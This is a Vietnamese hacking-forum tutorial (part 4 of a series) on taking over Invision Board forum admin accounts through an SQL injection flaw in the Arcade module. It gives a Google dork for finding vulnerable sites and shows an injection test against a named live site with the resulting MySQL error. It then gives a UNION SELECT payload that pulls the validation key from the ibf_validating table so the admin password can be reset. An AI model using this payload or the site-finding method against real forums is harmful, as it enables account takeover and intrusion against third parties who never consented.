Tổng Hợp hack IBF (bài 4)
Típ tục Với Bug Game Arcade
Link Bug :
http://milw0rm.com/exploits/1296Google với Key : allinurl:"index.php?act=Arcade"
Chọn đại 1 site nào ta bắt đầu
Test Bug ta thêm dấu phẩy vào
hxxp://www.nhocikaka.com/forums/index.php?act=Arcade&module=report&user=1'Run IE ta đc
Code:
mySQL query error: SELECT name FROM ibf_members WHERE id=1'
mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
mySQL error code:
Date: Tuesday 09th of november 2006 10 : 05 : 30 PM
Site đã dính Bug
Ở dây tui kô đề cập tới vấn đề lấy pass hash nữa mà change pass Admin luôn
Forgot pass Admin giống như mấy bài trên Reg&Code=10
Đợi tí rùi ta lấy Vkey bằng lệnh sau
Code:
?act=Arcade&module=report&user=-1%20%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20v%2cibf_topics%20t%20WHERE%20v.member_id=1
Thêm sau Index.php nha
Run IE nào ta sẽ thấy
Player Details for Vkey ở đây
Có Vkey rùi các bạn sẽ change pass admin giống như mấy bài trên đã nói
Hix Cop Xong và chỉnh sửa mấy bài này hi vọng mấy sếp Thăng chức cho kô thì buồn lắm
Nhocikaka(HCE)